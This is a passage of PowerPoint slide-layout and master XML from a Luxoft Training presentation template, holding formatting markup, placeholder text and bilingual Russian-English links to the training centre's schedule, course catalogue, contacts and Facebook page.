                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ресурс</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10"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2"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Информация </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>об </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>учебном центре</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="004281"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>www.luxoft-training.ru/about</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Расписание </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="004281"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F5282"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>www.luxoft-training.ru/timetable</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F5282"/>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Каталог курсов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8"/>
              </a:rPr>
              <a:t>www.luxoft-training.ru/training/catalog_directions</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Контакты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9"/>
              </a:rPr>
              <a:t>www.luxoft-training.ru/contacts</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>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Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13"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702175" y="5526088"/>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txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5157788" y="5721350"/>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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>www.facebook.com/TrainingCenterLuxoft</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>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Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15"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6"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7"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ru-RU" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="50800">
                    <a:srgbClr val="002060">
                      <a:alpha val="74000"/>
                    </a:srgbClr>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Внутренние ресурсы</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="736544" y="2720796"/>
            <a:ext cx="1638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Расписание, курсы, тренеры</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="462333" y="3538538"/>
            <a:ext cx="1971069" cy="85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Условия обучения, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>логистика,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="004281"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>контакты</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2339170" y="3754975"/>
            <a:ext cx="1420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pic>
        <p:nvPicPr>
          <p:cNvPr id="21"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869622"/>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formation (eng)">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113016" y="365126"/>
            <a:ext cx="8948791"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a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>LUXOFT TRAINING INFORMATION RESOURCES</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6"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361950" y="1360488"/>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8" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2233165" y="2637554"/>
            <a:ext cx="14208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2"/>
              </a:rPr>
              <a:t>IntHR</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" altLang="ru-RU" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>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sp>
        <p:nvSpPr>
          <p:cNvPr id="9"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smtClean="0">
                <a:ln w="3175">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="38100">
                    <a:schemeClr val="accent1">
                      <a:satMod val="175000"/>
                      <a:alpha val="41000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>External resources</a:t>
            </a:r>
            <a:endPar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mn-lt"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10"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2"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Information about Luxoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Training</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="004281"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>www.luxoft-training.ru/about</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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shedule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rgbClr val="1F5282"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>www.luxoft-training.ru/timetable</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F5282"/>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Courses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> catalogue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8"/>
              </a:rPr>
              <a:t>www.luxoft-training.ru/training/catalog_directions</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Contacts</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9"/>
              </a:rPr>
              <a:t>www.luxoft-training.ru/contacts</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>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mn-lt"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13"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493302" y="5757863"/>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txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4924425" y="5772472"/>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mn-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>www.facebook.com/TrainingCenterLuxoft</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>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mn-lt"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15"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6"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7"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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="50800">
                    <a:srgbClr val="002060">
                      <a:alpha val="74000"/>
                    </a:srgbClr>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Internal resources</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst>
                <a:glow rad="50800">
                  <a:srgbClr val="002060">
                    <a:alpha val="74000"/>
                  </a:srgbClr>
                </a:glow>
              </a:effectLst>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="485238" y="2659152"/>
            <a:ext cx="1817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mn-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Schedule, courses, trainers</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="505786" y="3452313"/>
            <a:ext cx="1822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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Study conditions, logistics, contacts</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2243440" y="3587983"/>
            <a:ext cx="1420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pic>
        <p:nvPicPr>
          <p:cNvPr id="21"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21539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481" y="1196978"/>
            <a:ext cx="8593931" cy="5008563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Up to seven lines of text.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3318422844"/>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
        <p:nvSpPr>
          <p:cNvPr id="7"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2724445081"/>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3" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286918" y="1196978"/>
            <a:ext cx="4185047" cy="5008563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Up to seven lines of text.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Symbol zastępczy tekstu 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695365" y="1196978"/>
            <a:ext cx="4185047" cy="5008563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Up to seven lines of text.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3419321528"/>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gi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23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.gif"/><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9" y="365126"/>
            <a:ext cx="8593493" cy="502622"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Edit Title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Symbol zastępczy tekstu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286919" y="1196975"/>
            <a:ext cx="8593493" cy="4979988"/>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en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 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343613" y="6476614"/>
            <a:ext cx="576000" cy="230400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="PoleTekstowe 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286919" y="6453958"/>
            <a:ext cx="1853392" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" sz="800" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Open Sans"/>
              </a:rPr>
              <a:t>http://www.luxoft-training.ru/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Open Sans"/>
              </a:rPr>
              <a:t>© Luxoft Training. All rights reserved</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="800" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2245703810"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483652" r:id="rId1"/>
    <p:sldLayoutId id="2147483680" r:id="rId2"/>
    <p:sldLayoutId id="2147483691" r:id="rId3"/>
    <p:sldLayoutId id="2147483650" r:id="rId4"/>
    <p:sldLayoutId id="2147483696" r:id="rId5"/>
    <p:sldLayoutId id="2147483695" r:id="rId6"/>
    <p:sldLayoutId id="2147483662" r:id="rId7"/>
    <p:sldLayoutId id="2147483651" r:id="rId8"/>
    <p:sldLayoutId id="2147483663" r:id="rId9"/>
    <p:sldLayoutId id="2147483684" r:id="rId10"/>
    <p:sldLayoutId id="2147483666" r:id="rId11"/>
    <p:sldLayoutId id="2147483668" r:id="rId12"/>
    <p:sldLayoutId id="2147483667" r:id="rId13"/>
    <p:sldLayoutId id="2147483664" r:id="rId14"/>
    <p:sldLayoutId id="2147483665" r:id="rId15"/>
    <p:sldLayoutId id="2147483678" r:id="rId16"/>
    <p:sldLayoutId id="2147483669" r:id="rId17"/>
    <p:sldLayoutId id="2147483670" r:id="rId18"/>
    <p:sldLayoutId id="2147483653" r:id="rId19"/>
    <p:sldLayoutId id="2147483677" r:id="rId20"/>
    <p:sldLayoutId id="2147483687" r:id="rId21"/>
  </p:sldLayoutIdLst>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="914377" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buNone/>
        <a:defRPr sz="3000" b="1" kern="1200">
          <a:solidFill>
            <a:srgbClr val="EB571C"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
          <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="359991"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2800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="685783" indent="-359991" algn="l" defTabSz="914377" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="130000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="EB571C"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="­"/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1142971" indent="-359991" algn="l" defTabSz="914377" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="130000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="24447D"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="w"/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1600160" indent="-359991" algn="l" defTabSz="914377" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="130000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="24447D"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="­"/>
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2057349"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9" y="365126"/>
            <a:ext cx="8593493" cy="502622"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
